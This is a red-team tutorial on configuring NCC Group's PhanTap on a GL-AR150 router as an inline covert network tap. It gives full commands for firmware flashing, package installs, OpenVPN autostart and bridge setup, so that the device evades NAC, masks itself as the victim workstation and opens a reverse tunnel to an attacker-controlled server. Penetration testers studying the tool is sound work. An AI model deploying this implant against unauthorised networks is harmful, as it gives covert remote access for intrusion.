The ‘PhanTap’ is an ‘invisible’ network tap written by the guys at NCC Group and aimed at red teams. With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network. PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X – 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device. It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting.
The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.
The NCC Group explains more about their software including basic setup instructions located here.
I will be setting up the ‘PhanTap’ in the following scenario:
The device will be placed between a target workstation and the corporate network by using Ethernet cables. The ‘PhanTap’ device, after being plugged in, will auto configure itself and establish a secure VPN (Virtual Private Network) connection back to a remote OpenVPN Access Server being operated by a red team. This will allow a reverse-tunnel back into the network from the OpenVPN Access Server.
Before configuring the ‘PhanTap’ device, I am going to set up an OpenVPN Access Server so the device has a end-point to connect with.
OpenVPN Access Server
To setup the OpenVPN Access Server, I will be using a DigitalOcean droplet, using the following options:
Once the droplet instance is live, I was then able to log into the web interface of the OpenVPN Access Server. Within the web interface, you need to create a new user along with a password. This new user will be the ‘PhanTap’ device connection profile, so I named my username ‘phantap’, respectively. Make sure you check ‘Allow auto-login’, and select ‘More Settings’ to reflect the options below:
Note: If you know the target subnet before hand, add those subnets under the VPN Gateway section. This is not required however.
Once the user has been saved, you will need to grab the user configuration by logging into the OpenVPN Access Server on port 443 and log in as ‘phantap’ user to download configuration.
Now that we have a OpenVPN Access Server, we can focus on setting up the ‘PhanTap’ device by powering it up and connecting both WAN and LAN ports to the internet and to your workstation respectively. I was able to log into the device using IP 192.168.1.1 using user ‘root‘ without a password.
Before we can setup the ‘phantap’ package for OpenWRT, we need to make sure the device is updated to the snapshot binary provided here.
After I downloaded the snapshot above on my workstation machine, I then SCP copied BOTH the upgrade.bin and client.ovpn files to the device’s /tmp directory :
wget "https://downloads.openwrt.org/snapshots/targets/ath79/generic/openwrt-ath79-generic-glinet_gl-ar150-squashfs-sysupgrade.bin" -O upgrade.bin scp upgrade.bin [email protected]:/tmp scp client.ovpn [email protected]:/tmp
Once the device contains the ‘upgrade.bin’ file, we can log back into the device at 192.168.1.1 to complete the setup.
opkg update sysupgrade -v /tmp/upgrade.bin
After the snapshot build has been installed, we can now setup openvpn as well as the phantap package.
opkg install nmap opkg install openvpn opkg install phantap
Next step would be to rename the file client.ovpn to client.conf, and move it into the /etc/openvpn directory. We need to make sure to enable the OpenVPN service to start when system starts.
mv /tmp/client.ovpn /etc/openvpn/client.conf /etc/init.d/openvpn enable
Before deploying this device, I need to make sure the VPN connection gets reset if the ‘PhanTap’ device detects when a new IP is configured.
sed -i 's/#list onnet/list onnet/g' /etc/config/phantap /etc/init.d/openvpn restart
After restarting the OpenVPN service, you should see a VPN connection coming from the ‘PhanTap’ device to your OpenVPN Access Server. This would be the user ‘phantap’ which means the ‘PhanTap’ VPN service is working good. Now that the VPN service automatically connects on start-up, we can now enable the phantap service and mask our device on the network.
Remove the interfaces from any network interface they might be used by.
uci delete network.lan.ifname uci delete network.wan.ifname uci delete network.wan6.ifname
Add the interfaces to the phantap bridge and restart the network service via the following commands in the cli (assuming we are using a GL-AR150):
uci set network.phantap.ifname='eth0 eth1' uci commit network /etc/init.d/network reload
Now once the device reboots, it will be ready to go. As soon as you plug this device into a new network, it will automatically mask as the target device and set up a reverse VPN tunnel into the network.